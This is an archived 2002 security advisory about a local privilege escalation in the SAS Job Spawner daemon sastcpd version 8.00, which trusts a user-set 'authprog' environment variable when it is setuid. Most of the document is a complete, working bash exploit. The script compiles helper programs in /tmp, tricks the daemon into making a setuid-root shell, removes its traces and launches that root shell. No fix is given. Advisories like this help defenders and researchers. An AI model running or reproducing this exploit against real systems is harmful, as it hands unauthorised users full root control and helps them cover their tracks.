31th Jan 2002 [SBWID-5051]
COMMAND
sastcpd trusts variables, this leads in local root exploit
SYSTEMS AFFECTED
SAS Job Spawner for Open Systems version 8.00
PROBLEM
The daemon passes a user-defined environment variable, \'authprog\', to
execve(). This obviously is a problem if sastcpd is setuid.
Exploit =======
#!/bin/bash
# sastcpd 8.0 \'authprog\' vulnerability.
# rpc <rpc@unholy.net> || <h@ckz.org>
# Thanks sharefuzz!
cat <<EOT >/tmp/hesh.c
int
main(void)
{
setuid(0);
setgid(0);
execl(\"/bin/ksh\", \"ksh\", (char *)0);
}
EOT
cat <<EOT >/tmp/heh.c
int
main(void)
{
setuid(0);
setgid(0);
system(\"chown 0:0 /tmp/hesh\");
system(\"chmod 4755 /tmp/hesh\");
return 0;
}
EOT
gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c
export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd
sleep 1
rm /tmp/he*.c
rm /tmp/heh
/tmp/hesh
SOLUTION
None yet
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
